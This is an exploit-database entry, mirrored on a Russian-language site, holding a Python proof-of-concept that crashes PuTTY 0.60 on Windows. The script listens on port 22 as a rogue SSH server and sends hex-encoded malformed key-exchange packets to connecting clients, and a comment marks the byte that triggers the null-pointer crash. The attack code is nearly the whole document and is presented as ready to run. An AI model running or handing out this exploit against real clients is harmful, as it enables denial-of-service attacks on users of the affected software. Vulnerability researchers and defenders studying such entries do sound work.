- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18270
- Проверка EDB
-
- Пройдено
- Автор
- LEVEL
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2011-12-24
Код:
print "\n"
print "----------------------------------------------------------------"
print "| putty 0.60 Null Ptr |"
print "| Level Smash the Stack |"
print "----------------------------------------------------------------"
print "\n"
import sys, socket, binascii
HOST = sys.argv[1]
PORT = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
buf = [
("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
"e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
"10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
"362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
"96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
"33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
"32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
"d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
"22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
"d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
"d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
"111001111111111111111111111111111"), ## The 00 controls the crash
("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
"64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
"76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
"85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
"000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
"3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
"a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
"f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
"3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
"b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
"75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
"20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
"6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
"ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
"cac4453d629a47d000000000000000000"),
("0000000c0a15a1640000c32700008e14")
]
i = 0
for i in range(0,len(buf)):
conn.send(binascii.unhexlify(buf[i]))
i+=1
conn.close()
s.close()
- Источник
- www.exploit-db.com